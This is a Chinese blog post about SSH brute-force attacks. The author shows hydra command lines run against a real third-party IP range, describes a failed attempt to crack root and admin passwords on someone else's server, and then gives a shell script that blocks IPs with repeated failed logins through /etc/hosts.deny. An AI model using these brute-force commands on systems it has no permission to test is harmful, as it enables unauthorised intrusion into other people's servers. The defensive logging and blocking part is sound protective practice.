你们应该看到我下图服务器被攻击的提示,今天就来说说如何攻击,我们又该如何防护:
前两次攻击是我自己攻击自己
剩下那些ip攻击,就属于恶意攻击。防人之心不可无。
先说说攻击模式如果你是Ubuntu系统直接就可以安装:
apt install hydra
就拿上面那些攻击我服务器ip来说吧(这里我不是恶意攻击只是举例):
首先我说过攻击服务器前篇你必须知道人家的ip地址+端口
ip:这块检测我还没想到怎么做
端口,攻击服务器前篇我说过了如图:
这个国外的服务器,开了3个端口,22,21,80
剩下就是攻击了,我尝试过用22端口对其暴力破解。
$hydra -l root -P 机房字典.txt -t 1 -vV -e ns 168.196.148.* ssh
给我的
我发现这个孩子是不是限制ip白名单,要fuck,不行我想是不是换端口搞他,我又切换端口21和用户 :
hydra -l admin -P 机房字典.txt -s 21 -t 1 -vV -e ns 168.196.148.* ssh
image.png
这搞得我怀疑人生,防护这么好,我太菜。。。。
image.png
其实hydra破解很强大,基本上包含了所有http协议
下面说说菜鸡防护介绍:
先查看异常登录次数:
cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn
异常登录次数
加个脚本,我真实测试过报错和上面那个孩子服务器一样,限制ip访问了:
LogPath=/var/log/secure
LimitLine=20 #根据需求而定
[ ! -f $LogPath ] && { echo "Warning:$LogPath is not exist!" ; exit 1;}
for i in `cat $LogPath | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn| awk '{print $1":"$2}'`
do
NUM=`echo $i | awk -F: '{print $1}'`
IP=`echo $i | awk -F: '{print $2}'`
if [ $NUM -gt $LimitLine ];then
grep $IP /etc/hosts.deny > /dev/null
if [ $? -gt 0 ];then
echo sshd:$IP >> /etc/hosts.deny
fi
fi
done
查看限制ip有哪些;
$ cat /etc/hosts.deny
可以看到限制ip登录了
成功让我自己不能访问了
网友评论